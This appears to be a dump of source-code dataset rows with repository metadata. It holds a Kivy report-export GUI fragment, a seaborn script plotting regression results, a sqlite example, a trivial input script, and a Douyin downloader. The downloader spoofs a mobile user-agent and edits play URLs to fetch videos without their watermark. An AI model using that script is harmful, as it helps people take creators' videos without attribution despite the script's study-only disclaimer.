                           content=chooser,
                           size_hint=(.9, .7), pos_hint={'center_x': 0.5, 'center_y': 0.5})
    return report_chooser
def create_document_format_selector(self):
    """Build the popup offering the document (Word) template choices."""
    root = BoxLayout(orientation='vertical')
    prompt = Label(text="Choose from the following format options.")
    prompt.font_family = "Y2"
    root.add_widget(prompt)
    buttons = BoxLayout()
    buttons.size_hint = (1, .1)
    # One button per template; each handler records the choice and advances.
    for caption, handler in (("Utah Policy", self.is_policy),
                             ("Y2 Analytics", self.is_y2),
                             ("Other", self.is_other)):
        buttons.add_widget(Button(text=caption, on_press=handler))
    root.add_widget(buttons)
    return Popup(title='Choose format',
                 content=root,
                 size_hint=(.9, .7), pos_hint={'center_x': 0.5, 'center_y': 0.5})
def create_spreadsheet_format_selector(self):
    """Build the popup offering the spreadsheet (Excel) template choices."""
    root = BoxLayout(orientation='vertical')
    prompt = Label(text="Choose from the following format options.")
    prompt.font_family = "Y2"
    root.add_widget(prompt)
    buttons = BoxLayout()
    buttons.size_hint = (1, .1)
    # One button per template; each handler records the choice and advances.
    for caption, handler in (("Qualtrics", self.is_qualtrics),
                             ("Utah Policy", self.is_policy),
                             ("Y2 Analytics", self.is_y2)):
        buttons.add_widget(Button(text=caption, on_press=handler))
    root.add_widget(buttons)
    return Popup(title='Choose format',
                 content=root,
                 size_hint=(.9, .7), pos_hint={'center_x': 0.5, 'center_y': 0.5})
def create_other_template_dialog(self):
    """Build the chooser used when the user picks the 'Other' template option.

    Selecting a .docx file stores its path in __template_file_path and moves
    on to the save prompt; clicking 'open' with nothing selected raises
    IndexError inside open_file, which is converted to an error popup.
    """
    chooser = BoxLayout()
    container = BoxLayout(orientation='vertical')
    def open_file(path, filename):
        try:
            # filename is the chooser's selection list; empty when nothing picked.
            filepath = os.path.join(path, filename[0])
            self.__template_file_path = filepath
            self.other_template_dialog_to_save()
        except IndexError:
            self.error_message("Please select a template document (.docx) file")
    filechooser = FileChooserListView()
    filechooser.path = os.path.expanduser("~")
    # NOTE(review): this bind callback only reads the selection and discards it;
    # it looks like a no-op — confirm whether it can be removed.
    filechooser.bind(on_selection=lambda x: filechooser.selection)
    filechooser.filters = ["*.docx"]
    open_btn = Button(text='open', size_hint=(.2, .1), pos_hint={'center_x': 0.5, 'center_y': 0.5})
    open_btn.bind(on_release=lambda x: open_file(filechooser.path, filechooser.selection))
    container.add_widget(filechooser)
    container.add_widget(open_btn)
    chooser.add_widget(container)
    file_chooser = Popup(title='Open file',
                         content=chooser,
                         size_hint=(.9, .7), pos_hint={'center_x': 0.5, 'center_y': 0.5})
    return file_chooser
def create_save_file_prompt(self):
    """Build the popup telling the user the next step is choosing a save location."""
    layout = BoxLayout(orientation='vertical')
    message = Label(text="Choose a file location and name for topline appendix report")
    message.font_family = "Y2"
    layout.add_widget(message)
    advance = Button(text='>', size_hint=(.2, .2))
    advance.pos_hint = {'center_x': 0.5, 'center_y': 0.5}
    advance.bind(on_release=self.save_file_prompt_to_dialog)
    layout.add_widget(advance)
    return Popup(title="Select save file location",
                 content=layout,
                 size_hint=(.7, .5), pos_hint={'center_x': 0.5, 'center_y': 0.5})
def create_save_file_dialog(self):
    """Build the save-location popup (icon chooser plus a file-name text box).

    This is created lazily (see save_file_prompt_to_dialog) because the
    default file name and forced extension depend on whether a document or
    spreadsheet report was chosen earlier (__is_doc_report).
    """
    chooser = BoxLayout()
    container = BoxLayout(orientation='vertical')
    filechooser = FileChooserIconView()
    filechooser.path = os.path.expanduser("~")
    container.add_widget(filechooser)
    def save_file(path, filename):
        filepath = os.path.join(path, filename)
        # NOTE: rebinds the `path` parameter; only `ext` is used afterwards.
        path, ext = os.path.splitext(filepath)
        # Force the extension matching the chosen report type when missing.
        if ext != ".xlsx" and ext != ".docx":
            if self.__is_doc_report:
                filepath += ".docx"
            else:
                filepath += ".xlsx"
        self.__save_filename = filepath
        self.finish()
    button_layout = BoxLayout()
    button_layout.size_hint = (1, .1)
    # Default file name reflects the report kind chosen earlier.
    if self.__is_doc_report:
        file_default = "File name.docx"
    else:
        file_default = "File name.xlsx"
    file_name = TextInput(text=file_default)
    button_layout.add_widget(file_name)
    save_btn = Button(text='save', size_hint=(.2, 1))
    save_btn.bind(on_release=lambda x: save_file(filechooser.path, file_name.text))
    button_layout.add_widget(save_btn)
    container.add_widget(button_layout)
    chooser.add_widget(container)
    file_chooser = Popup(title='Save report',
                         content=chooser,
                         size_hint=(.9, .7), pos_hint={'center_x': 0.5, 'center_y': 0.5})
    return file_chooser
def run(self, controller):
    """Entry point for the appendix workflow: store the controller and show the first prompt."""
    # Cleared here; only set later if the user picks a custom ('Other') template.
    self.__template_file_path = None
    self.__controller = controller
    self.open_file_prompt.open()
def open_file_prompt_to_dialog(self, instance):
    """Button callback: advance from the intro prompt to the CSV chooser."""
    self.open_file_prompt.dismiss()
    self.open_file_dialog.open()
def open_file_dialog_to_report_selector(self):
    """Load the chosen CSV into the model, then show the report-type selector.

    Any failure while building the model is reported via an error popup so
    the GUI stays alive instead of propagating the exception.
    """
    self.open_file_dialog.dismiss()
    try:
        self.__controller.build_appendix_model(self.__open_filename)
        self.report_selector.open()
    # Fix: was a bare `except:`, which also swallowed SystemExit/KeyboardInterrupt.
    except Exception:
        self.error_message("Error reading in data file.")
def is_doc(self, instance):
    """Handle the 'Document' choice: record the report type and show document formats.

    Bug fix: this never set __is_doc_report, so after is_sheet had run once
    (setting it False) a later 'Document' choice still produced a
    spreadsheet-style default file name and .xlsx extension in the save dialog.
    """
    self.__is_doc_report = True  # mirror of is_sheet, which sets False
    self.report_selector.dismiss()
    self.document_format_selector.open()
def is_sheet(self, instance):
    """Handle the 'Spreadsheet' choice: record the report type and show spreadsheet formats."""
    self.__is_doc_report = False
    self.report_selector.dismiss()
    self.spreadsheet_format_selector.open()
def is_qualtrics(self, instance):
    """Record the Qualtrics template choice and move to the save prompt.

    Both selectors are dismissed since either may be open; presumably
    dismissing an unopened Popup is harmless — confirm against kivy docs.
    """
    self.__template_name = "QUALTRICS"
    self.document_format_selector.dismiss()
    self.spreadsheet_format_selector.dismiss()
    self.save_file_prompt.open()
def is_y2(self, instance):
    """Record the Y2 Analytics template choice and move to the save prompt."""
    self.__template_name = "Y2"
    # Either selector may be the one currently open; dismiss both.
    self.document_format_selector.dismiss()
    self.spreadsheet_format_selector.dismiss()
    self.save_file_prompt.open()
def is_policy(self, instance):
    """Record the Utah Policy template choice and move to the save prompt."""
    self.__template_name = "UT_POLICY"
    # Either selector may be the one currently open; dismiss both.
    self.document_format_selector.dismiss()
    self.spreadsheet_format_selector.dismiss()
    self.save_file_prompt.open()
def is_other(self, instance):
    """Record the custom ('Other') template choice and open the template file chooser."""
    self.__template_name = "OTHER"
    # Either selector may be the one currently open; dismiss both.
    self.document_format_selector.dismiss()
    self.spreadsheet_format_selector.dismiss()
    self.other_template_dialog.open()
def other_template_dialog_to_save(self):
    """After a custom template file was picked, advance to the save prompt."""
    self.other_template_dialog.dismiss()
    self.save_file_prompt.open()
def save_file_prompt_to_dialog(self, instance):
    """Button callback: build the save dialog now and open it.

    The dialog is created here rather than in __init__ because its default
    file name/extension depends on the report type chosen in between.
    """
    self.save_file_prompt.dismiss()
    self.save_file_dialog = self.create_save_file_dialog()
    self.save_file_dialog.open()
def finish(self):
    """Dismiss the save dialog and hand all collected choices to the controller."""
    self.save_file_dialog.dismiss()
    # NOTE(review): a try/except showing "Error formatting appendix report."
    # was left commented out here, so report-building errors currently
    # propagate out of the event loop. Re-enable it deliberately if the
    # friendly error popup is wanted. (Dead commented-out code removed.)
    self.__controller.build_appendix_report(self.__save_filename, self.__is_doc_report, self.__template_name, self.__template_file_path)
def error_message(self, error):
    """Show `error` text in a modal popup titled 'Something Went Wrong'."""
    label = Label(text=error)
    label.font_family = "Y2"
    popup = Popup(title="Something Went Wrong",
                  content=label,
                  size_hint=(.5, .8), pos_hint={'center_x': 0.5, 'center_y': 0.5})
    popup.open()
| [
"kathryn@y2analytics.com"
] | kathryn@y2analytics.com |
e36f731f026dc6e0c20ae3cf067138808c6531d2 | 4bd1f3407a7b9d456034f62b71354d94778b7f54 | /plots_regression.py | ec256e9fc1e4149d5600c0487a77a24ed14ea7cb | [] | no_license | mgmrussell/applied-ai-msc | f2287efc51e80cb5d2a335133b60088c39859d47 | 31f6b3add6fa6cb31af737cafc451f146cc23445 | refs/heads/main | 2023-08-16T03:23:37.334422 | 2021-09-17T12:14:28 | 2021-09-17T12:14:28 | 407,523,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,076 | py | from matplotlib.colors import ListedColormap
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import pandas as pd
from scipy import stats
import constant
import numpy as np
def initialize_data():
    """Load the regression results and per-dataset target std-devs, derive extra columns.

    Reads 'reg_result0p2.csv' and 'reg_data_y_std.csv' from the working
    directory and returns one DataFrame with unscaled/root MSE columns and a
    short dataset label column 'ds'.
    """
    results = pd.read_csv('reg_result0p2.csv')
    std_table = pd.read_csv('reg_data_y_std.csv')
    # Map dataset name (first column) -> std of its target (second column).
    std_by_dataset = {}
    for _, record in std_table.iterrows():
        std_by_dataset[record[0]] = record[1]
    results['target_std'] = results.apply(lambda r: std_by_dataset[r['dataset']], axis=1)
    results['mse_test_by_train'] = results['mse_test'] / results['mse_train']
    # Undo the target scaling: multiply by the target variance.
    target_var = results['target_std'] * results['target_std']
    results['unscaled_mse_train'] = results['mse_train'] * target_var
    results['unscaled_mse_test'] = results['mse_test'] * target_var
    results['r_mse_train'] = results.apply(lambda r: np.sqrt(r['mse_train']), axis=1)
    results['r_mse_test'] = results.apply(lambda r: np.sqrt(r['mse_test']), axis=1)
    # Short label: the text between parentheses, e.g. "Automobile (AM)" -> "AM".
    results['ds'] = results.apply(lambda r: r['dataset'].split('(')[1].split(')')[0], axis=1)
    return results
def get_confidence_percent(t_value, df):
    """Convert a two-sided t statistic into a signed confidence percentage.

    Scans integer confidence levels ci = 0..100 and picks the one whose
    two-sided critical value t_{1-ci/200, df} lies closest to |t_value|,
    returning 100 - ci. The result is negated for positive t and positive
    for negative t, preserving the sign convention the heatmaps rely on.

    Bug fix: the degrees-of-freedom argument `df` was accepted but ignored —
    the critical values were always computed with df=40. It is now used.
    """
    sign = 1
    if t_value < 0:
        sign = -1
        t_value = -t_value
    cis = np.linspace(0, 100, 101)
    del_t = 100
    answer = 0
    for ci in cis:
        ti = stats.t.ppf(1 - ci / 100 / 2, df)
        if abs(ti - t_value) < del_t:
            answer = 100 - ci
            del_t = abs(ti - t_value)
    return -sign * answer
def confidence_interval(name):
    """Pairwise signed confidence table (Welch-style t) for column `name`.

    Rows and columns are the regressors from constant.Regression; each cell
    is the signed confidence percent from get_confidence_percent.
    """
    algorithms = [e.name for e in constant.Regression]
    table = pd.DataFrame([], columns=algorithms)
    data = initialize_data()
    data = data.loc[(data['ts'] == 0.2)]
    for first in constant.Regression:
        # describe() indices: [0]=count, [1]=mean, [2]=std.
        first_stats = data.loc[(data['group'] == first.name)][name].describe()
        n = len(data.loc[(data['group'] == first.name)][name])
        row = {}
        for second in constant.Regression:
            second_stats = data.loc[(data['group'] == second.name)][name].describe()
            t_value = (first_stats[1] - second_stats[1]) / np.sqrt(
                first_stats[2] * first_stats[2] / first_stats[0]
                + second_stats[2] * second_stats[2] / second_stats[0])
            row[second.name] = [get_confidence_percent(t_value, 2 * n - 2)]
        table = pd.concat([table, pd.DataFrame(data=row, index=[first.name])])
    return table
def accuracy(name):
    """Pivot the results: one row per dataset, one column per regressor, holding column `name`."""
    algorithms = [e.name for e in constant.Regression]
    table = pd.DataFrame([], columns=algorithms)
    data = initialize_data()
    data = data.loc[(data['ts'] == 0.2)]
    datasets = data['ds'].unique()
    datasets.sort()
    for ds in datasets:
        subset = data.loc[(data['ds'] == ds)]
        row = {}
        # Each record contributes the metric value under its regressor's column.
        for _, record in subset.iterrows():
            row[record['group']] = record[name]
        table = pd.concat([table, pd.DataFrame(data=row, index=[ds])])
    return table
def compare_lms(ylabel='', column='', ax=None):
    """Box-plot + strip-plot of `column` from the module-level result_df, grouped by regressor.

    Bug fix: when ax was None the original still called ax.set_xlabel /
    ax.set_ylabel on None and crashed with AttributeError; the current axes
    is now used instead. (The in-script callers always pass an axes.)
    """
    if ax is None:
        ax = plt.gca()
    g = sns.boxplot(x='group', y=column, data=result_df, showmeans=True, ax=ax)
    sns.stripplot(x='group', y=column, data=result_df, color="navy", jitter=0.05, size=2.0, ax=ax)
    plt.title("", loc="left")
    ax.set_xlabel('')
    ax.set_ylabel(ylabel, size=14)
    return g
# --- Figure 1: test vs train R-squared heatmaps, one regressor per column ---
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
r2_test = accuracy('r2_test')
r2_train = accuracy('r2_train')
g1 = sns.heatmap(r2_test, cmap='bone', fmt='.3f', linewidths=0.5, annot=r2_test, cbar=False, ax=ax1)
g2 = sns.heatmap(r2_train, cmap='bone', fmt='.3f', linewidths=0.5, annot=r2_train, cbar=False, ax=ax2)
# Move the x tick labels to the top of each heatmap, horizontal.
for ax in [g1, g2]:
    tl = ax.get_xticklabels()
    ax.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
    ax.set_xticklabels(tl, rotation=0)
plt.show()
# --- Figure 2: test MSE and overfitting ratio (test/train MSE) heatmaps ---
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
mse_test = accuracy('mse_test')
mse_test_by_train = accuracy('mse_test_by_train')
g1 = sns.heatmap(mse_test, cmap='bone_r', fmt='.3f', linewidths=0.5, annot=mse_test, cbar=False, ax=ax1)
g2 = sns.heatmap(mse_test_by_train, cmap='bone_r', linewidths=0.5,
                 annot=mse_test_by_train, linecolor='gray', cbar=False, ax=ax2)
for ax in [g1, g2]:
    tl = ax.get_xticklabels()
    ax.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
    ax.set_xticklabels(tl, rotation=0)
plt.show()
# --- Figure 3: pairwise confidence tables for root-MSE (test and train) ---
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
confidence_interval_test = confidence_interval('r_mse_test')
# print(confidence_interval_test)
confidence_interval_train = confidence_interval('r_mse_train')
# print(confidence_interval_train)
g1 = sns.heatmap(confidence_interval_test, cmap='bone',
                 annot=confidence_interval_test, cbar=False, ax=ax1)
g2 = sns.heatmap(confidence_interval_train, cmap='bone',
                 annot=confidence_interval_train, cbar=False, ax=ax2)
# Append a percent sign to every annotation text.
for t in g1.texts:
    t.set_text(t.get_text() + "%")
for t in g2.texts:
    t.set_text(t.get_text() + "%")
for ax in [g1, g2]:
    tl = ax.get_xticklabels()
    ax.set_xticklabels(tl, rotation=0)
    ax.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
    tly = ax.get_yticklabels()
    ax.set_yticklabels(tly, rotation=0)
plt.show()
# --- Figure 4: Scaling to Big Data — fitted log-time model table + projected curves ---
time_result = pd.read_csv('reg_time_model.csv')
# Sample sizes n = 10^2 .. 10^8 (log10 scale), fixed dimensionality d = 1000.
ns = np.log10(np.logspace(2, 8, 20))
d = np.log10(1000)
time = {}
# Evaluate each regressor's fitted model log(t) = a*log(n) + b*log(d) + c.
for group in time_result.index:
    logn = time_result.loc[(time_result.index == group)]['log(n)'][group]
    logd = time_result.loc[(time_result.index == group)]['log(d)'][group]
    Intercept = time_result.loc[(time_result.index == group)]['Intercept'][group]
    time[group] = (logn*ns + logd*d + Intercept)
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
# Left: coefficients table rendered as a white heatmap; right: projected curves.
sns.heatmap(time_result, fmt='.2f', cmap=ListedColormap(['white']), linewidths=0.5,
            linecolor='gray', cbar=False, annot=time_result, ax=ax1)
ax1.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
for group in time_result.index:
    ax2.plot(ns, time[group], '.-', label=group)
ax2.text(3.5, 9, r'$d$ = ' + str(int(10 ** d)))
ax2.set_xlabel(r'$log_{10}(n)$')
ax2.set_ylabel(r'$log_{10}(time)$')
ax2.legend()
plt.show()
# --- Figure 5: Bias / Variance box plots (result_df is the global used by compare_lms) ---
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
result_df = initialize_data()
result_df = result_df.loc[(result_df['ts'] == 0.2)]
# result_df = result_df.loc[(result_df['group'] != 'OLS')]
result_df = result_df.loc[(result_df['dataset'] != 'Automobile (AM)')]
g1 = compare_lms(ylabel=r'Bias Error', column='bias', ax=ax1)
g2 = compare_lms(ylabel=r'Variance Error', column='variance', ax=ax2)
plt.show()
# --- Figure 6: Bias / Variance heatmaps per dataset ---
f, (ax1, ax2) = plt.subplots(1, 2, gridspec_kw={'width_ratios': [1, 1]})
bias = accuracy('bias')
variance = accuracy('variance')
g1 = sns.heatmap(bias, cmap='bone_r', linewidths=0.5, annot=bias, linecolor='gray', cbar=False, ax=ax1)
g2 = sns.heatmap(variance, cmap='bone_r', linewidths=0.5,
                 annot=variance, linecolor='gray', cbar=False, ax=ax2)
for ax in [g1, g2]:
    tl = ax.get_xticklabels()
    ax.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
    ax.set_xticklabels(tl, rotation=0)
plt.show()
# --- Figure 7: summary table — per-regressor averages with friendly column names ---
result_df = initialize_data()
result_df = result_df.loc[(result_df['ts'] == 0.2)]
result_df['Regressors'] = result_df['group']
result_df = result_df.drop('group', axis=1)
new = result_df.groupby(['Regressors']).mean()
# Copy metrics under display names, then drop all the raw columns.
new['R2 Test'] = new['r2_test']
new['R2 Train'] = new['r2_train']
new['MSE Test'] = new['mse_test']
new['MSE Train'] = new['mse_train']
new['CV-Score'] = new['avg_csv']
new['Bias'] = new['bias']
new['Variance'] = new['variance']
new['Training Time (s)'] = new['t_time']
new = new.drop(['r2_train', 'r2_test', 'bias', 'variance', 't_time', 'c_time',
                'avg_csv', 'min_csv', 'max_csv', 'feat_imp', 'ts',
                'mse_train', 'mse_test', 'coeffs', 'alpha', 'l1_ratio', 'gamma', 'C',
                'target_std', 'mse_test_by_train', 'unscaled_mse_train',
                'unscaled_mse_test', 'r_mse_train', 'r_mse_test'], axis=1)
new = new.sort_values('R2 Test', ascending=False)
ax = sns.heatmap(new, cmap=ListedColormap(['white']),
                 linewidths=0.5, linecolor='gray', cbar=False, annot=new)
ax.tick_params(axis='x', which='major', labelbottom=False, bottom=False, top=False, labeltop=True)
tl = ax.get_xticklabels()
ax.set_xticklabels(tl, rotation=0)
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
2b264b55b123a8cd5b282f6bb7e18cab92f2e684 | e533a0ed04ef500d394d2a36131214109fd09925 | /test_04_11_4.py | e7eabac535b0302c5edab0f859e6061f397171c5 | [] | no_license | rocmc/Python_edu_171216 | 03a20ada87fbb6af00794d44b1c677840b95fdeb | f704211c96d75bef0a8b26c1d91227076b2f73ca | refs/heads/master | 2021-03-19T15:38:59.719369 | 2017-12-23T08:16:20 | 2017-12-23T08:16:20 | 114,445,355 | 0 | 0 | null | null | null | null | UHC | Python | false | false | 427 | py | #coding: euc-kr
import sqlite3
db = sqlite3.connect("test.db")
cursor = db.cursor()
# 삭제 SQL
cursor.execute("""DELETE
FROM PHONEBOOK
WHERE EMAIL=?""",
("visual@naver.com",))
# 반드시 커밋을 한다
db.commit()
cursor.execute("""SELECT NAME, PHONE, EMAIL
FROM PHONEBOOK""")
rows = cursor.fetchall()
print(rows)
cursor.close()
db.close()
| [
"corea811@gmail.com"
] | corea811@gmail.com |
3a7267565f9ff70b2e81cefb0c86b27fd8f3b565 | f62007cbfe69b169bc6fac79c143856e027af46c | /Day1/length.py | 5c774bd03af217463c727630ea0a611cebc618b9 | [] | no_license | nithishkumar98/100-days-of-python | 272bff29d85cf99a54358fe79ab44fe63ea0870a | def3089ab482a70a2cc12fad28ef65bc6de6a6be | refs/heads/master | 2023-06-25T00:42:33.873203 | 2021-07-20T18:19:30 | 2021-07-20T18:19:30 | 386,530,741 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | name = input("What is your name?")
# Report the character count of the previously-entered name.
length = (len(name))
print("The length of the "+name+" is " + str(length))
| [
"nithishindians@gmail.com"
] | nithishindians@gmail.com |
17ed53f882b6351a4dfc34a6cd9a6c7e3bcc5816 | 95d7e59587cbe49e9b2cd54b9b7d1d7bd0e2d73a | /爬虫/code/抖音无水印下载.py | d4a779d2b6f2cd73d286ed8c633db581ce8bcd63 | [
"MIT"
] | permissive | oncesimple/heima_python_learn | ddba1428c52cd3029019aad085ff79e8b0ebed0e | e4a2ff7e4f95ed910d54888d6ed79b315d0f148b | refs/heads/master | 2023-03-29T08:17:17.476068 | 2021-04-10T10:17:39 | 2021-04-10T10:17:39 | 356,540,341 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,386 | py | #!/usr/bin/python3
# -*- coding:utf-8 -*-
__author__ = 'hyh'
__date__ = '2020/7/4 21:07'
import re
import requests
"""
TODO 声明
脚本仅仅提供学习使用,拿来盗别人视频,或者商业用途,后果自负作者不会承担任何责任。。
"""
def request(url, timeout=None):
    """GET `url` with a mobile (WeChat) User-Agent and return the raw response.

    The mobile UA makes douyin's share pages serve the lightweight endpoints
    the rest of the script parses.

    :param url: address to fetch
    :param timeout: optional requests timeout in seconds; default None keeps
        the original no-timeout behaviour (backward compatible)
    :return: the requests.Response object (status code is not checked here)
    """
    headers = {
        "user-agent": "Mozilla/5.0 (Linux; Android 5.0; SM-N9100 Build/LRX21V) > AppleWebKit/537.36 (KHTML, "
                      "like Gecko) Version/4.0 > Chrome/37.0.0.0 Mobile Safari/537.36 > "
                      "MicroMessenger/6.0.2.56_r958800.520 NetType/WIFI",
    }
    response = requests.get(url, headers=headers, timeout=timeout)
    return response
def main():
    """Prompt for a shared douyin link, resolve it, and save the clip without the watermark."""
    share_link = input('请输入抖音视频链接:')
    # Follow the short share URL to the canonical video page URL.
    resolved = request(re.findall("(http.*/)", share_link)[0]).url
    # The sixth path segment of the resolved URL is the video item id.
    item_api = f'https://www.iesdouyin.com/web/api/v2/' \
               f'aweme/iteminfo/?item_ids={resolved.split("/")[5]}'
    payload = request(item_api).json()
    media = {
        "mp3": payload['item_list'][0]['music']['play_url']['uri'],
        # Removing "wm" from the play address yields the watermark-free stream.
        "mp4": payload['item_list'][0]['video']['play_addr']['url_list'][0].replace("wm", ""),
        "name": payload['item_list'][0]['desc']
    }
    # Replace characters that are illegal in file names with '-'.
    safe_name = re.sub('[\/:*?"<>|]', '-', media['name'])
    with open(f'{safe_name}.mp4', 'wb') as out:
        out.write(request(media['mp4']).content)
    print("下载完成")
# Run the interactive downloader only when executed as a script.
if __name__ == '__main__':
    main()
| [
"once_simple@outlook.com"
] | once_simple@outlook.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.